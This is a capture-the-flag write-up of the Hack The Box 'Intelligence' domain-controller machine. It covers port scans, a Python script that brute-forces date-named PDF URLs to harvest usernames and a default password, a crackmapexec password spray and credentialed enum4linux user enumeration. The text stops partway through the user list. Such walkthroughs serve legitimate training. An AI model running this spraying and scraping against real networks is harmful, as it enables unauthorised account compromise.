Intelligence
Completed on Aug 31, 2021
Overview
From the Active Directory machines HTB content developers have created, there is always something to learn. Intelligence gives you another approach on how an AD miconfiguration can lead to a domain compromise. In this case, unconstrained delegation is the path to owning AD; something that should definitely be avoided if possible or at least asset lock down. I hope this write-up provides some insight to others as it did for me while working on this machine.
References:
Enumeration
Finding Open Ports
Just like we normally do, we will try to find out what services are exposed so we know how to proceed. In this box, we will expand the port scan to UDP ports as well.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ nmap -Pn -p- --min-rate=1000 -T4 intelligence.htb -oN int_openPorts.log -oX int_openPorts.xml
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-27 23:43 EDT
Nmap scan report for intelligence.htb (10.129.95.154)
Host is up (0.045s latency).
Not shown: 65515 filtered ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49693/tcp open unknown
49694/tcp open unknown
49704/tcp open unknown
49716/tcp open unknown
51742/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 94.07 seconds
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ sudo nmap -Pn -sU -p- --min-rate=1000 -T4 intelligence.htb
[sudo] password for jxberrios:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-27 23:49 EDT
Nmap scan report for intelligence.htb (10.129.95.154)
Host is up (0.045s latency).
Not shown: 65532 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
123/udp open ntp
389/udp open ldap
Nmap done: 1 IP address (1 host up) scanned in 116.38 seconds
Let's run nmap default scripts and service versioning against the TCP ports found.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ PORTS=$(cat int_openPorts.log | grep tcp | cut -d "/" -f1 | xargs | tr " " ",")
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ nmap -sC -sV intelligence.htb -p $PORTS -oN int_PortScan.log -oX int_PortScan.xml
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-28 00:00 EDT
Nmap scan report for intelligence.htb (10.129.95.154)
Host is up (0.042s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-08-28 10:58:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-08-28T10:59:47+00:00; +6h57m50s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-08-28T10:59:47+00:00; +6h57m50s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-08-28T10:59:47+00:00; +6h57m50s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-08-28T10:59:47+00:00; +6h57m50s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49694/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49704/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
51742/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h57m49s, deviation: 0s, median: 6h57m49s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-08-28T10:59:08
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.49 seconds
This machine has the typical open ports from domain controllers along with NTP and UDP LDAP, but let's just go through the process and inspect each service and try to rely on low hanging fruits.
From the certificate information in LDAP and LDAPS, we see dc.intelligence.htb. Let's add this to the hosts file.
Inspecting Web Application
After inspecting the site, we see two PDF documents can be downloaded.
Let's download and inspect these documents:
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ wget http://dc.intelligence.htb/documents/2020-01-01-upload.pdf
--2021-08-29 00:57:03-- http://dc.intelligence.htb/documents/2020-01-01-upload.pdf
Resolving dc.intelligence.htb (dc.intelligence.htb)... 10.129.30.68
Connecting to dc.intelligence.htb (dc.intelligence.htb)|10.129.30.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 26835 (26K) [application/pdf]
Saving to: ‘2020-01-01-upload.pdf’
2020-01-01-upload.pd 100%[=====================>] 26.21K --.-KB/s in 0.04s
2021-08-29 00:57:03 (651 KB/s) - ‘2020-01-01-upload.pdf’ saved [26835/26835]
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ wget http://dc.intelligence.htb/documents/2020-12-15-upload.pdf
--2021-08-29 00:57:15-- http://dc.intelligence.htb/documents/2020-12-15-upload.pdf
Resolving dc.intelligence.htb (dc.intelligence.htb)... 10.129.30.68
Connecting to dc.intelligence.htb (dc.intelligence.htb)|10.129.30.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27242 (27K) [application/pdf]
Saving to: ‘2020-12-15-upload.pdf’
2020-12-15-upload.pd 100%[=====================>] 26.60K --.-KB/s in 0.04s
2021-08-29 00:57:15 (683 KB/s) - ‘2020-12-15-upload.pdf’ saved [27242/27242]
Inspecting PDF Files
Using exiftool to inspect the PDF files:
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ exiftool 2020-01-01-upload.pdf
ExifTool Version Number : 12.16
File Name : 2020-01-01-upload.pdf
Directory : .
File Size : 26 KiB
File Modification Date/Time : 2021:04:01 13:00:00-04:00
File Access Date/Time : 2021:08:29 00:57:03-04:00
File Inode Change Date/Time : 2021:08:29 00:57:03-04:00
File Permissions : rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.5
Linearized : No
Page Count : 1
Creator : William.Lee
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ exiftool 2020-12-15-upload.pdf
ExifTool Version Number : 12.16
File Name : 2020-12-15-upload.pdf
Directory : .
File Size : 27 KiB
File Modification Date/Time : 2021:04:01 13:00:00-04:00
File Access Date/Time : 2021:08:29 00:57:15-04:00
File Inode Change Date/Time : 2021:08:29 00:57:15-04:00
File Permissions : rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.5
Linearized : No
Page Count : 1
Creator : Jose.Williams
From the content of these files, we now have a naming conversation for user accounts so let's create a users list including other possible combinations:
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ cat << EOF >> users.txt
heredoc> William.Lee
heredoc> Jose.Williams
heredoc> administrator
heredoc> wlee
heredoc> jwilliams
heredoc> Guest
heredoc> EOF
User Enumeration with Kerbrute
Using Kerbrute for user enumeration can help determine which ones are valid, and rule out what could be garbage:
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ kerbrute userenum --dc dc.intelligence.htb -d intelligence.htb users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 08/29/21 - Ronnie Flathers @ropnop
2021/08/29 01:42:53 > Using KDC(s):
2021/08/29 01:42:53 > dc.intelligence.htb:88
2021/08/29 01:42:53 > [+] VALID USERNAME: William.Lee@intelligence.htb
2021/08/29 01:42:53 > [+] VALID USERNAME: Jose.Williams@intelligence.htb
2021/08/29 01:42:53 > [+] VALID USERNAME: administrator@intelligence.htb
2021/08/29 01:42:53 > Done! Tested 6 usernames (3 valid) in 0.048 seconds
Custom Scripting for PDF Content Extraction
Looking to see if there are more PDF files and to extract their information, we need to test the download and extract the metadata. For this, we created a script that will take care of the requests, creating a user list, extract the metadata while creating a file with the information from the found PDF files:
#!/usr/bin/env python3
import os
import requests
from pdfminer.high_level import extract_text
from pdfminer.pdfparser import PDFParser
from pdfminer.pdfdocument import PDFDocument
def main():
URL = 'http://intelligence.htb/documents/'
KEYWORD = 'user'
os.mkdir("./pdf")
for year in range(2020, 2022):
for month in range(1, 13):
for day in range(1, 32):
pdf_file = "{0}-{1:02}-{2:02}-upload.pdf".format(
year,
month,
day
)
req = requests.get(URL + pdf_file)
path = "./pdf/{}".format(pdf_file)
if req.status_code == 200:
print("File: " + pdf_file)
with open(path, 'wb') as pdffile:
pdffile.write(req.content)
# Extracting PDF File Metadata
with open(path, 'rb') as pdffile:
creator = PDFDocument(PDFParser(
pdffile)).info[0]["Creator"].decode()
print("PDF Creator: " + creator)
# Creating User List from PDF Metadata
with open("./user_list.txt", 'a') as user:
user.write(creator + "\n")
# Extracting PDF Content
data = extract_text(path)
if KEYWORD in data:
print("Content: " + data)
with open("./valid_data.txt", 'a') as valid:
valid.write("File: {}\n\n".format(pdf_file))
valid.write("PDF Creator: {}\n\n".format(creator))
valid.write("Content: {}\n\n".format(data))
print("\n")
os.remove(path)
os.rmdir("./pdf")
if __name__ == "__main__":
main()
After running this script, we obtained a password along with a username from the PDF metadata:
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ cat valid_data.txt
File: 2020-06-04-upload.pdf
PDF Creator: Jason.Patterson
Content: New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.
The obvious next step is to test this password and attempt to use it with the PDF creator username.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ smbclient -L intelligence.htb -W "ingelligence.htb" -U "Jason.Patterson%NewIntelligenceCorpUser9876"
session setup failed: NT_STATUS_LOGON_FAILURE
Password Spraying
If we test with this credential set, this will not work but given the message in the PDF, doing some password spraying could lead us to a valid credential pair.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ crackmapexec smb dc.intelligence.htb -d intelligence.htb -u user_list.txt -p NewIntelligenceCorpUser9876 --continue-on-success
SMB intelligence.htb 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB intelligence.htb 445 DC [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Danny.Matthews:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Brian.Morris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Anita.Roberts:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Brian.Baker:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Kelly.Long:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jason.Patterson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Darryl.Harris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\David.Wilson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Teresa.Williamson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jessica.Moody:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
SMB intelligence.htb 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jessica.Moody:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Brian.Baker:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Anita.Roberts:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Teresa.Williamson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
SMB intelligence.htb 445 DC [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Kelly.Long:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\David.Wilson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Thomas.Hall:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jason.Patterson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Kelly.Long:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Danny.Matthews:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jessica.Moody:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Anita.Roberts:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
This confirms the user which this password works with. The credential set is:
User: Tiffany.Molina
Password: NewIntelligenceCorpUser9876
SMB and LDAP Enumeration with Enum4Linux
The header of this section doesn't pay tribute to what enum4linux does as it is more than just SMB and LDAP, but let's expand our enumeration to other services:
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ enum4linux -w 'intelligence.htb' -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -U -G -S -o intelligence.htb
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Aug 29 21:11:26 2021
=========================================( Target Information )=========================================
Target ........... intelligence.htb
RID Range ........ 500-550,1000-1050
Username ......... 'Tiffany.Molina'
Password ......... 'NewIntelligenceCorpUser9876'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
==========================( Enumerating Workgroup/Domain on intelligence.htb )==========================
[+] Got domain/workgroup name: intelligence.htb
=================================( Session Check on intelligence.htb )=================================
[+] Server intelligence.htb allows sessions using username 'Tiffany.Molina', password 'NewIntelligenceCorpUser9876'
==============================( Getting domain SID for intelligence.htb )==============================
Domain Name: intelligence
Domain Sid: S-1-5-21-4210132550-3389855604-3437519686
[+] Host is part of a domain (not a workgroup)
=================================( OS information on intelligence.htb )=================================
[E] Can't get OS info with smbclient
[+] Got OS info for intelligence.htb from srvinfo:
INTELLIGENCE.HTWk Sv PDC Tim NT
platform_id : 500
os version : 10.0
server type : 0x80102b
=====================================( Users on intelligence.htb )=====================================
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xf86 RID: 0x46b acb: 0x00000210 Account: Anita.Roberts Name: (null) Desc: (null)
index: 0xf7c RID: 0x461 acb: 0x00000210 Account: Brian.Baker Name: (null) Desc: (null)
index: 0xf87 RID: 0x46c acb: 0x00000210 Account: Brian.Morris Name: (null) Desc: (null)
index: 0xf88 RID: 0x46d acb: 0x00000210 Account: Daniel.Shelton Name: (null) Desc: (null)
index: 0xf6a RID: 0x44f acb: 0x00000210 Account: Danny.Matthews Name: (null) Desc: (null)
index: 0xf80 RID: 0x465 acb: 0x00000210 Account: Darryl.Harris Name: (null) Desc: (null)
index: 0xf6e RID: 0x453 acb: 0x00000210 Account: David.Mcbride Name: (null) Desc: (null)
index: 0xf70 RID: 0x455 acb: 0x00000210 Account: David.Reed Name: (null) Desc: (null)
index: 0xf7f RID: 0x464 acb: 0x00000210 Account: David.Wilson Name: (null) Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xf71 RID: 0x456 acb: 0x00000210 Account: Ian.Duncan Name: (null) Desc: (null)
index: 0xf8b RID: 0x470 acb: 0x00000210 Account: James.Curbow Name: (null) Desc: (null)
index: 0xf8d RID: 0x472 acb: 0x00000210 Account: Jason.Patterson Name: (null) Desc: (null)
index: 0xf6c RID: 0x451 acb: 0x00000210 Account: Jason.Wright Name: (null) Desc: (null)
index: 0xf85 RID: 0x46a acb: 0x00000210 Account: Jean.Walter Name: (null) Desc: (null)
index: 0xf73 RID: 0x458 acb: 0x00000210 Account: Jennifer.Thomas Name: (null) Desc: (null)
index: 0xf8c RID: 0x471 acb: 0x00000210 Account: Jeremy.Mora Name: (null) Desc: (null)
index: 0xf89 RID: 0x46e acb: 0x00000210 Account: Jessica.Moody Name: (null) Desc: (null)
index: 0xf84 RID: 0x469 acb: 0x00000210 Account: Joel.Crawford Name: (null) Desc: (null)
index: 0xf79 RID: 0x45e acb: 0x00000210 Account: John.Coleman Name: (null) Desc: (null)
index: 0xf6b RID: 0x450 acb: 0x00000210 Account: Jose.Williams Name: (null) Desc: (null)
index: 0xf74 RID: 0x459 acb: 0x00000210 Account: Kaitlyn.Zimmerman Name: (null) Desc: (null)
index: 0xf76 RID: 0x45b acb: 0x00000210 Account: Kelly.Long Name: (null) Desc: (null)
index: 0xf10 RID: 0x1f6 acb: 0x00000211 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0xf8e RID: 0x473 acb: 0x00000210 Account: Laura.Lee Name: (null) Desc: (null)
index: 0xf72 RID: 0x457 acb: 0x00000210 Account: Michelle.Kent Name: (null) Desc: (null)
index: 0xf77 RID: 0x45c acb: 0x00000210 Account: Nicole.Brock Name: (null) Desc: (null)
index: 0xf7d RID: 0x462 acb: 0x00000210 Account: Richard.Williams Name: (null) Desc: (null)
index: 0xf6d RID: 0x452 acb: 0x00000210 Account: Samuel.Richardson Name: (null) Desc: (null)
index: 0xf6f RID: 0x454 acb: 0x00000210 Account: Scott.Scott Name: (null) Desc: (null)
